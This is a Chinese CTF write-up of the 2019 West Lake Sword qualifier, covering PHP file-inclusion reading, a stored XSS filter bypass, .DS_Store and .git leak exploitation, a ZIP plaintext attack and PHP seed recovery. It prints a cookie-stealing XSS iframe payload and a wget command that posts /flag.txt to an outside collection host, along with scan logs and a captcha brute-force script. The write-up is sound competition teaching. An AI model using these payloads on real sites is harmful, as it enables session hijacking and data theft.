更新:2019年04月11日,安恒周周练里提供了复现环境:https://www.linkedbyx.com/taskinfo/516/detail

2019年04月07日,我们参加了第三届西湖论剑网络安全技能大赛预选赛,虽然最后没进决赛,但有些题目我认为还是很值得写一写 WriteUp 的。

说明:

1、非常感谢我的两位队友 @巫妖 @京京 的合作,第一次合作打 CTF 配合得真的非常舒服。

2、由于安恒在赛后把靶机给关了,所以我就暂时只能借助我电脑上现有的资料来 写 WriteUp 了。所以很多步骤暂时没有图,得等安恒给出复现环境以后才能截图,见谅哈。

3、环境的话,Mac OS 下面挂着两个虚拟机 Win10 和 Kail Linux,三边依照所需要的工具切换。

开始。

第一题(300分)babyt3 :

题目

知识点:目录遍历和文件包含。

比赛靶机: http://ctf3.linkedbyx.com:11310/

复现靶机:http://61.164.47.198:10000

步骤:

1、首先访问靶机,发现是一个类似于博客一样的网站。

2、看一下网页的源码,里面有个提示,似乎可以读取网站的源码。

include $_GET['file'];

具体是啥忘记了,得等复现环境出来了再更正。

2、访问 /?file=php://filter/convert.base64-encode/resource=index.php ,解码 Base64,得到 index.php 源码

 <?php
 $a = @$_GET['file'];
 if (!$a) {
  $a = './templates/index.html';
 }
 echo 'include $_GET[\'file\']';
 if (strpos('flag',$a)!==false) {
  die('nonono');
 }
 include $a;
 ?>
 

 <!--hint: ZGlyLnBocA== -->

看一下这个源码,发现里面有个 hit:

<!-- Hit: ZGlyLnBocA== -->

3、Base64 解码一下,发现这个是 dir.php。

4、那么我们再来读一下 dir.php 的源码,访问 /?file=php://filter/convert.base64-encode/resource=dir.php

5、解码 Base64,得到 dir.php 源码。

 <?php
 $a = @$_GET['dir'];
 if(!$a){
 $a = '/tmp';
 }
 var_dump(scandir($a));

6、可以看到我们可以利用这个文件随意遍历目录了,先来遍历根目录。访问 /dir.php?dir=/

array(25) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(16) "ffffflag_1s_Her4" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(7) "my_init" [14]=> string(10) "my_service" [15]=> string(3) "opt" [16]=> string(4) "proc" [17]=> string(4) "root" [18]=> string(3) "run" [19]=> string(4) "sbin" [20]=> string(3) "srv" [21]=> string(3) "sys" [22]=> string(3) "tmp" [23]=> string(3) "usr" [24]=> string(3) "var" }

7、很幸运的,看到返回的目录列表里就有一个 ffffflag_1s_Her4。

8、继续 dir ffffflag_1s_Her4 这个目标,返回了 False,说明这个是一个文件。那么就用读取文件的方法来盘他。访问 /?file=php://filter/convert.base64-encode/resource=/ffffflag_1s_Her4

9、得到一个 Base64,解码得到 flag。

flag{*********************************}

第二题(300分)Breakout:

题目

知识点:储存型 XSS 与其过滤的绕过

比赛靶机:http://ctf1.linkedbyx.com:10351/

复现靶机:http://61.164.47.198:10001/

步骤:

1、首先访问靶机,发现要登录,随便输入一组账号密码,发现能直接登录进去。

2、进去以后发现有三个模块:

Message:留言板,可以在这里留言和看留言。

Report:给管理员报告页面上的 Bug。

Exec:执行命令,有一个输入框和一个执行按钮,还有一个清除所有留言的按钮。

3、先看第一个 Message 这里的留言板,试用一下,推测有储存型 XSS。

4、那么我们就来构造一个 XSS 上去,不断的去尝试绕过过滤。

5、最终发现如下的语句可以绕过并且成功 XSS。 当然,我们得先改一下输入框的最大长度。

长度改为 400
<iframe src="javas	cript:(function(){(new Image()).src='http://xss.zhaoj.in/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();">

上面的代码可能会被转码,可以打开这个文本文件看这里的:

breakout下载

5、然后到 Report 页面提交一个 Message 页面的 Report,验证码那里是要前六位一致,那直接找个 Python 程序去撞,我这里网上找了一个。来源:https://blog.csdn.net/wwl1117/article/details/79104960

import string, hashlib

a = string.digits + string.lowercase + string.uppercase
for i in a:
    for j in a:
        for k in a:
            for m in a:
                s = hashlib.md5(i + j + k + m).hexdigest()[0:4]
                if s == "******":
                    print(i + j + k + m)
                    break

6、Report 上去,XSS 平台收 Cookie。

XSS平台

7、然后置 Cookie,发现能在 Exec 页面提交命令了,这里我们提交如下这个命令先试试,读取一下本地的文件传上去。

wget --post-file=/flag.txt http://xss.zhaoj.in/
测试这个命令试试

8、然后就可以在 XSS 平台收到请求了。

平台上收到请求了

9、Flag 到手~

第三题(300分) 猜猜flag是什么:

知识点:敏感文件泄露以及利用(DS_Store 以及 Git),Zip 加密档案明文攻击,PHP 随机数种子获取。

比赛靶机:http://ctf1.linkedbyx.com:10172/

复现靶机:http://61.164.47.198:10002/

步骤:

1、 访问靶机,发现是一个骚气的在线赌场。猜测参数,发现要是传 name 和 code 参数页面会有变化,name 会原样显示, code 会提示 Wrong,错咯。

骚气

2、Kail Linux 下开 Uniscan 扫起来。

Uniscan

3、扫完之后结果如下,发现这样一个结果 http://ctf1.linkedbyx.com:10172/.DS_Store

#
 Uniscan project
 http://uniscan.sourceforge.net/
 #
 V. 6.3
 Scan date: 7-4-2019 10:13:20
 | Domain: http://ctf1.linkedbyx.com:10172/
 | Server: Apache/2.4.18 (Ubuntu)
 | IP: 101.68.81.236
 |
 | Directory check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/flag/
 |                                                                                                   
 | File check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/.DS_Store
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/index.php
 | Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07 10:11 CST
 | NSE: Loaded 148 scripts for scanning.
 | NSE: Script Pre-scanning.
 | Initiating NSE at 10:11
 | Completed NSE at 10:11, 0.00s elapsed
 | Initiating NSE at 10:11
 | Completed NSE at 10:11, 0.00s elapsed
 | Initiating Ping Scan at 10:11
 | Scanning ctf1.linkedbyx.com (101.68.81.236) [4 ports]
 | Completed Ping Scan at 10:11, 0.04s elapsed (1 total hosts)
 | Initiating Parallel DNS resolution of 1 host. at 10:11
 | Completed Parallel DNS resolution of 1 host. at 10:11, 0.06s elapsed
 | Initiating SYN Stealth Scan at 10:11
 | Scanning ctf1.linkedbyx.com (101.68.81.236) [1000 ports]
 | Discovered open port 10012/tcp on 101.68.81.236
 | Discovered open port 10082/tcp on 101.68.81.236
 | Discovered open port 10025/tcp on 101.68.81.236
 | Discovered open port 10215/tcp on 101.68.81.236
 | Discovered open port 10002/tcp on 101.68.81.236
 | Increasing send delay for 101.68.81.236 from 0 to 5 due to max_successful_tryno increase to 4
 | Increasing send delay for 101.68.81.236 from 5 to 10 due to max_successful_tryno increase to 5
 | SYN Stealth Scan Timing: About 46.26% done; ETC: 10:12 (0:00:36 remaining)
 | Increasing send delay for 101.68.81.236 from 10 to 20 due to max_successful_tryno increase to 6
 | Increasing send delay for 101.68.81.236 from 20 to 40 due to max_successful_tryno increase to 7
 | Completed SYN Stealth Scan at 10:14, 166.64s elapsed (1000 total ports)
 | Initiating Service scan at 10:14
 | Scanning 5 services on ctf1.linkedbyx.com (101.68.81.236)
 | Completed Service scan at 10:15, 88.35s elapsed (5 services on 1 host)
 | Initiating OS detection (try #1) against ctf1.linkedbyx.com (101.68.81.236)
 | Retrying OS detection (try #2) against ctf1.linkedbyx.com (101.68.81.236)
 | Initiating Traceroute at 10:15
 | Completed Traceroute at 10:15, 0.01s elapsed
 | Initiating Parallel DNS resolution of 1 host. at 10:15
 | Completed Parallel DNS resolution of 1 host. at 10:15, 0.01s elapsed
 | NSE: Script scanning 101.68.81.236.
 | Initiating NSE at 10:15
 | Completed NSE at 10:15, 3.93s elapsed
 | Initiating NSE at 10:15
 | Completed NSE at 10:15, 1.08s elapsed
 | Nmap scan report for ctf1.linkedbyx.com (101.68.81.236)
 | Host is up (0.0068s latency).
 | Not shown: 648 closed ports, 347 filtered ports
 | PORT      STATE SERVICE VERSION
 | 10002/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 | | http-methods: 
 | |_  Supported Methods: GET HEAD POST OPTIONS
 | |http-server-header: Apache/2.4.18 (Ubuntu) | |_http-title: Have a guess~ | 10012/tcp open  http    Apache httpd 2.4.18 ((Ubuntu)) | | http-methods:  | |  Supported Methods: GET HEAD POST OPTIONS
 | |http-server-header: Apache/2.4.18 (Ubuntu) | |_http-title: Have a guess~ | 10025/tcp open  unknown | | fingerprint-strings:  | |   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, RPCCheck, TerminalServer, X11Probe, afp, giop:  | |     Please Tell Your ID: | |   GenericLines:  | |     Please Tell Your ID:Hello  | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   GetRequest:  | |     Please Tell Your ID:Hello GET / HTTP/1.0 | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   HTTPOptions:  | |     Please Tell Your ID:Hello OPTIONS / HTTP/1.0 | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   Help:  | |     Please Tell Your ID:Hello HELP | |     Tell me the size of your story: | |   LPDString:  | |     Please Tell Your ID:Hello  | |     default | |     Tell me the size of your story: | |   NotesRPC:  | |     Please Tell Your ID:Hello : | |     Tell me the size of your story: | |   RTSPRequest:  | |     Please Tell Your ID:Hello OPTIONS / RTSP/1.0 | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   ms-sql-s:  | |     Please Tell Your ID:Hello  | |    Tell me the size of your story:
 | 10082/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
 | | http-methods: 
 | |_  Supported Methods: GET HEAD POST OPTIONS
 | |http-server-header: Apache/2.4.18 (Ubuntu) | |_http-title: Have a guess~ | 10215/tcp open  unknown | | fingerprint-strings:  | |   DNSStatusRequestTCP, DNSVersionBindReqTCP, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, RPCCheck, SMBProgNeg, TLSSessionReq, TerminalServer, WMSRequest, X11Probe, afp:  | |     Please Tell Your ID: | |   GenericLines:  | |     Please Tell Your ID:Hello  | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   GetRequest:  | |     Please Tell Your ID:Hello GET / HTTP/1.0 | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   HTTPOptions:  | |     Please Tell Your ID:Hello OPTIONS / HTTP/1.0 | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   Help:  | |     Please Tell Your ID:Hello HELP | |     Tell me the size of your story: | |   LPDString:  | |     Please Tell Your ID:Hello  | |     default | |     Tell me the size of your story: | |   NotesRPC:  | |     Please Tell Your ID:Hello : | |     Tell me the size of your story: | |   RTSPRequest:  | |     Please Tell Your ID:Hello OPTIONS / RTSP/1.0 | |     Tell me the size of your story: | |     speak your story: | |     Thank you for you share!! | |   ms-sql-s:  | |     Please Tell Your ID:Hello  | |    Tell me the size of your story:
 | 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 | SF-Port10025-TCP:V=7.70%I=7%D=4/7%Time=5CA95CFE%P=x86_64-pc-linux-gnu%r(NU
 | SF:LL,14,"Please\x20Tell\x20Your\x20ID:")%r(GenericLines,70,"Please\x20Tel
 | SF:l\x20Your\x20ID:Hello\x20\r\nTell\x20me\x20the\x20size\x20of\x20your\x2
 | SF:0story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20for\x20
 | SF:you\x20share!!\n")%r(GetRequest,7E,"Please\x20Tell\x20Your\x20ID:Hello\
 | SF:x20GET\x20/\x20HTTP/1.0\r\nTell\x20me\x20the\x20size\x20of\x20your\x20
 | SF:story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20for\x20y
 | SF:ou\x20share!!\n")%r(HTTPOptions,82,"Please\x20Tell\x20Your\x20ID:Hello\
 | SF:x20OPTIONS\x20/\x20HTTP/1.0\r\nTell\x20me\x20the\x20size\x20of\x20your
 | SF:\x20story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20for\
 | SF:x20you\x20share!!\n")%r(RTSPRequest,82,"Please\x20Tell\x20Your\x20ID:He
 | SF:llo\x20OPTIONS\x20/\x20RTSP/1.0\r\nTell\x20me\x20the\x20size\x20of\x20
 | SF:your\x20story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20
 | SF:for\x20you\x20share!!\n")%r(RPCCheck,14,"Please\x20Tell\x20Your\x20ID:"
 | SF:)%r(DNSVersionBindReqTCP,14,"Please\x20Tell\x20Your\x20ID:")%r(DNSStatu
 | SF:sRequestTCP,14,"Please\x20Tell\x20Your\x20ID:")%r(Help,40,"Please\x20Te
 | SF:ll\x20Your\x20ID:Hello\x20HELP\r\nTell\x20me\x20the\x20size\x20of\x20yo
 | SF:ur\x20story:\n")%r(Kerberos,14,"Please\x20Tell\x20Your\x20ID:")%r(X11Pr
 | SF:obe,14,"Please\x20Tell\x20Your\x20ID:")%r(FourOhFourRequest,14,"Please\
 | SF:x20Tell\x20Your\x20ID:")%r(LPDString,43,"Please\x20Tell\x20Your\x20ID:H
 | SF:ello\x20\x01default\nTell\x20me\x20the\x20size\x20of\x20your\x20story:\
 | SF:n")%r(LDAPSearchReq,14,"Please\x20Tell\x20Your\x20ID:")%r(LDAPBindReq,1
 | SF:4,"Please\x20Tell\x20Your\x20ID:")%r(LANDesk-RC,14,"Please\x20Tell\x20Y
 | SF:our\x20ID:")%r(TerminalServer,14,"Please\x20Tell\x20Your\x20ID:")%r(NCP
 | SF:,14,"Please\x20Tell\x20Your\x20ID:")%r(NotesRPC,3C,"Please\x20Tell\x20Y
 | SF:our\x20ID:Hello\x20:\nTell\x20me\x20the\x20size\x20of\x20your\x20story:
 | SF:\n")%r(JavaRMI,14,"Please\x20Tell\x20Your\x20ID:")%r(ms-sql-s,3D,"Pleas
 | SF:e\x20Tell\x20Your\x20ID:Hello\x20\x12\x01\nTell\x20me\x20the\x20size\x2
 | SF:0of\x20your\x20story:\n")%r(afp,14,"Please\x20Tell\x20Your\x20ID:")%r(g
 | SF:iop,14,"Please\x20Tell\x20Your\x20ID:");
 | ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
 | SF-Port10215-TCP:V=7.70%I=7%D=4/7%Time=5CA95CFE%P=x86_64-pc-linux-gnu%r(NU
 | SF:LL,14,"Please\x20Tell\x20Your\x20ID:")%r(GenericLines,70,"Please\x20Tel
 | SF:l\x20Your\x20ID:Hello\x20\r\nTell\x20me\x20the\x20size\x20of\x20your\x2
 | SF:0story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20for\x20
 | SF:you\x20share!!\n")%r(GetRequest,7E,"Please\x20Tell\x20Your\x20ID:Hello\
 | SF:x20GET\x20/\x20HTTP/1.0\r\nTell\x20me\x20the\x20size\x20of\x20your\x20
 | SF:story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20for\x20y
 | SF:ou\x20share!!\n")%r(HTTPOptions,82,"Please\x20Tell\x20Your\x20ID:Hello\
 | SF:x20OPTIONS\x20/\x20HTTP/1.0\r\nTell\x20me\x20the\x20size\x20of\x20your
 | SF:\x20story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20for\
 | SF:x20you\x20share!!\n")%r(RTSPRequest,82,"Please\x20Tell\x20Your\x20ID:He
 | SF:llo\x20OPTIONS\x20/\x20RTSP/1.0\r\nTell\x20me\x20the\x20size\x20of\x20
 | SF:your\x20story:\nYou\x20can\x20speak\x20your\x20story:\nThank\x20you\x20
 | SF:for\x20you\x20share!!\n")%r(RPCCheck,14,"Please\x20Tell\x20Your\x20ID:"
 | SF:)%r(DNSVersionBindReqTCP,14,"Please\x20Tell\x20Your\x20ID:")%r(DNSStatu
 | SF:sRequestTCP,14,"Please\x20Tell\x20Your\x20ID:")%r(Help,40,"Please\x20Te
 | SF:ll\x20Your\x20ID:Hello\x20HELP\r\nTell\x20me\x20the\x20size\x20of\x20yo
 | SF:ur\x20story:\n")%r(TLSSessionReq,14,"Please\x20Tell\x20Your\x20ID:")%r(
 | SF:SMBProgNeg,14,"Please\x20Tell\x20Your\x20ID:")%r(X11Probe,14,"Please\x2
 | SF:0Tell\x20Your\x20ID:")%r(LPDString,43,"Please\x20Tell\x20Your\x20ID:Hel
 | SF:lo\x20\x01default\nTell\x20me\x20the\x20size\x20of\x20your\x20story:\n"
 | SF:)%r(LDAPSearchReq,14,"Please\x20Tell\x20Your\x20ID:")%r(LDAPBindReq,14,
 | SF:"Please\x20Tell\x20Your\x20ID:")%r(LANDesk-RC,14,"Please\x20Tell\x20You
 | SF:r\x20ID:")%r(TerminalServer,14,"Please\x20Tell\x20Your\x20ID:")%r(NCP,1
 | SF:4,"Please\x20Tell\x20Your\x20ID:")%r(NotesRPC,3C,"Please\x20Tell\x20You
 | SF:r\x20ID:Hello\x20:\nTell\x20me\x20the\x20size\x20of\x20your\x20story:\n
 | SF:")%r(JavaRMI,14,"Please\x20Tell\x20Your\x20ID:")%r(WMSRequest,14,"Pleas
 | SF:e\x20Tell\x20Your\x20ID:")%r(ms-sql-s,3D,"Please\x20Tell\x20Your\x20ID:
 | SF:Hello\x20\x12\x01\nTell\x20me\x20the\x20size\x20of\x20your\x20story:\n"
 | SF:)%r(afp,14,"Please\x20Tell\x20Your\x20ID:");
 | Device type: firewall
 | Running (JUST GUESSING): Fortinet embedded (96%)
 | OS CPE: cpe:/h:fortinet:fortigate_200b
 | Aggressive OS guesses: Fortinet FortiGate 200B firewall (96%)
 | No exact OS matches for host (test conditions non-ideal).
 | Network Distance: 1 hop
 | TCP Sequence Prediction: Difficulty=163 (Good luck!)
 | IP ID Sequence Generation: Busy server or unknown class
 | 
 | TRACEROUTE (using port 80/tcp)
 | HOP RTT     ADDRESS
 | 1   0.10 ms 101.68.81.236
 | 
 | NSE: Script Post-scanning.
 | Initiating NSE at 10:15
 | Completed NSE at 10:15, 0.00s elapsed
 | Initiating NSE at 10:15
 | Completed NSE at 10:15, 0.00s elapsed
 | Read data files from: /usr/bin/../share/nmap
 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 | Nmap done: 1 IP address (1 host up) scanned in 265.42 seconds
 |            Raw packets sent: 6491 (290.084KB) | Rcvd: 17132 (1.134MB)
 |
 | Directory check:
 |
 | Check robots.txt:
 |
 | Check sitemap.xml:
 ===================================================================================================
 Scan end date: 7-4-2019 10:16:6
 HTML report saved in: report/ctf1.linkedbyx.com.html
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/flag/
 |                                                                                                   
 | File check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/.DS_Store
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/index.php
 |
 | Check robots.txt:
 |
 | Check sitemap.xml:
 |
 | Crawler Started:
 | Plugin name: E-mail Detection v.1.1 Loaded.
 | Plugin name: phpinfo() Disclosure v.1 Loaded.
 | Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
 | Plugin name: External Host Detect v.1.2 Loaded.
 | Plugin name: Upload Form Detect v.1.1 Loaded.
 | Plugin name: FCKeditor upload test v.1 Loaded.
 | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
 | Plugin name: Code Disclosure v.1.1 Loaded.
 | [+] Crawling finished, 0 URL's found!
 |
 | E-mails:
 |
 | PHPinfo() Disclosure:
 |
 | Web Backdoors:
 |
 | External hosts:
 |
 | File Upload Forms:
 |
 | FCKeditor File Upload:
 |
 | Timthumb:
 |
 | Source Code Disclosure:
 |
 | Ignored Files: 
 | Dynamic tests:
 | Plugin name: Learning New Directories v.1.2 Loaded.
 | Plugin name: FCKedior tests v.1.1 Loaded.
 | Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
 | Plugin name: Find Backup Files v.1.2 Loaded.
 | Plugin name: Blind SQL-injection tests v.1.3 Loaded.
 | Plugin name: Local File Include tests v.1.1 Loaded.
 | Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
 | Plugin name: Remote Command Execution tests v.1.1 Loaded.
 | Plugin name: Remote File Include tests v.1.2 Loaded.
 | Plugin name: SQL-injection tests v.1.2 Loaded.
 | Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
 | Plugin name: Web Shell Finder v.1.3 Loaded.
 | [+] 0 New directories added
 |                                                                                                   
 |                                                                                                   
 | FCKeditor tests:
 | Skipped because /testing123 did not return the code 404
 |                                                                                                   
 |                                                                                                   
 | Timthumb < 1.33 vulnerability:
 |                                                                                                   
 |                                                                                                   
 | Backup Files:
 | Skipped because /testing123 did not return the code 404
 |                                                                                                   
 |                                                                                                   
 | Blind SQL Injection:
 |                                                                                                   
 |                                                                                                   
 | Local File Include:
 |                                                                                                   
 |                                                                                                   
 | PHP CGI Argument Injection:
 |                                                                                                   
 |                                                                                                   
 | Remote Command Execution:
 |                                                                                                   
 |                                                                                                   
 | Remote File Include:
 |                                                                                                   
 |                                                                                                   
 | SQL Injection:
 |                                                                                                   
 |                                                                                                   
 | Cross-Site Scripting (XSS):
 |                                                                                                   
 |                                                                                                   
 | Web Shell Finder:
 | Static tests:
 | Plugin name: Local File Include tests v.1.1 Loaded.
 | Plugin name: Remote Command Execution tests v.1.1 Loaded.
 | Plugin name: Remote File Include tests v.1.1 Loaded.
 |                                                                                                   
 |                                                                                                   
 | Local File Include:
 |                                                                                                   
 |                                                                                                   
 | Remote Command Execution:
 |                                                                                                   
 |                                                                                                   
 | Remote File Include:
 Scan end date: 7-4-2019 10:20:11

4、上网找了一个利用工具 https://github.com/lijiejie/ds_store_exp,用起来。

python /Users/jinzhao/Downloads/ds_store_exp-master/ds_store_exp.py "http://ctf1.linkedbyx.com:10172/.DS_Store"

结果如下:

5、发现这里有一个 http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e ,打开瞧瞧,是这样一个页面。

6、那我们继续来扫扫这个目录下的敏感文件。Uniscan 继续走。

Uniscan 扫这个子目录

7、这把不走运,并没有扫到啥。

#
 Uniscan project
 http://uniscan.sourceforge.net/
 #
 V. 6.3
 Scan date: 7-4-2019 10:44:33
 | Domain: http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/
 | Server: Apache/2.4.18 (Ubuntu)
 | IP: 101.68.81.236
 |
 | Directory check:
 |                                                                                                   
 | File check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/index.php
 |
 | Check robots.txt:
 |
 | Check sitemap.xml:
 ===================================================================================================
 Scan end date: 7-4-2019 10:48:45

8、那就手工来测测,发现测到 .git 目录时不是 404 了,说明有 .git 泄露。

9、网上找了个工具 https://github.com/cumtxujiabin/GitHack , 用起来。 

python /Users/jinzhao/Downloads/GitHack-master/GitHack.py http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/.git/

10、打开 BackupForMySite.zip 这个压缩文件看看,发现加了密。里面有个 Hint 文件正是我们需要的。


11、不过别慌,index.php 和 lengzhu.jpg 这两个我们都有明文文件,而且它们都在这个加密压缩包里。那么我们就可以用 明文攻击 来获取解压密钥了。

12、我们得先备好一个明文压缩文件,既然之前有 DS_Store 我们就推测他是在 Mac OS 下压缩的吧,那么就在 Mac OS 下压缩 index.php 这个文件。要是用不同的方式压缩,在下面用 APCHPR 明文攻击的时候会出错,提示找不到压缩文件。

12、在这里我切换到 Windows 下,用 ARCHPR 解密。填好相应的设置,开始。

13、到找口令这里就别让他找了,点停止。

14、会提示加密密钥恢复成功。


15、然后就会提示我们保存解密之后的 Zip 了。


16、打开解密之后的 Zip,查看 hint 文件。

17、Code 拿到,访问 http://ctf1.linkedbyx.com:10172/?name=glzjin&code=9faedd5999937171912159d28b219d86,这样我们就拿到了“兑换码”

18、综合上面的 hint 里的 “flag saved in flag/seed.txt”,访问 /flag/seed.txt 试试,但是里面的内容为 “NAIVE”。并不是 flag。

19、发现 17 步页面每一个小时都会发生变化,那么就大胆推测其为固定随机数种子生成的随机数,且轮数依照小时数发生变化。

20、查询得知 https://www.openwall.com/php_mt_seed/ 这个工具可以根据随机数撞出随机数种子,我们用起来。

21、首先在 Kail Linux 下编译这个工具。

22、然后将页面上的 Code 作为随机数放入,运行程序,发现找到了八个可能的随机数种子。

不要在意,这个随机数是下一个小时的随机数了。

23、测试访问 /flag/{随机数种子}.txt,发现 /flag/261530.txt 也就是第一个随机数种子可以访问,里面就是 flag!

24、Flag 到手~

第四题(300分)比赛时无人做出,未复现:

靶机:http://ctf2.linkedbyx.com:10963/

知识点:反射型 XSS

步骤:

1、打开靶机,发现是一个登录界面。

2、查看这个页面的源码,发现里面有个提示,似乎是指向注册页面

<!-- /main/register -->

3、那么就到 /main/register 注册一下。

4、登录之后发现又是一个留言板。

5、打 XSS 试试,不行。

6、查看 Report 页面,测试储存型 XSS 不行。

7、查看资料编辑页面,可以上传图片作为头像。

8、尝试各种姿势上传非图片,未果。

9、仔细测试那个留言板,发现有回复功能,而且回复之后对提到的前文回复有预览,发现一个可能可以利用的反射 XSS 点。/main/post?p=http://xss.zhaoj.in

10、但有内容策略限制,未果。

11、不知道怎么整了。